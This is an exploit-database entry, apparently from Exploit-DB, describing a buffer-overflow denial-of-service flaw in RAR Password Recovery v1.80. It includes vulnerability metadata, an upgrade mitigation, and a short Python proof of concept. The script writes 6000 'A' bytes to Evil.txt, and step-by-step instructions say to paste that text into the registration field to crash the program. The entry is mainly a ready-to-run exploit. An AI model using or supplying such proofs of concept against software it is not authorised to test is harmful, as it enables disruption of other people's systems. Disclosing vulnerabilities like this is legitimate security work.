RAR Password Recovery v1.80 Denial of Service Exploit

vendor:

RAR Password Recovery

by:

Achilles

7.8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: RAR Password Recovery

Affected Version From: v1.80

Affected Version To: v1.80

Patch Exists: YES

Related CWE: N/A

CPE: a:top-password:rar_password_recovery

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64, Windows XP SP3

2019

RAR Password Recovery v1.80 Denial of Service Exploit

A buffer overflow vulnerability exists in RAR Password Recovery v1.80 when a maliciously crafted User Name and Registration Code is processed, which could allow an attacker to cause a denial of service condition. An attacker can leverage this vulnerability by creating a maliciously crafted file, copying its contents to the clipboard, and then pasting it into the User Name and Registration Code field of the application. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of RAR Password Recovery.

Source

Exploit-DB raw data:

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link:  https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
#            Windows XP SP3


# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"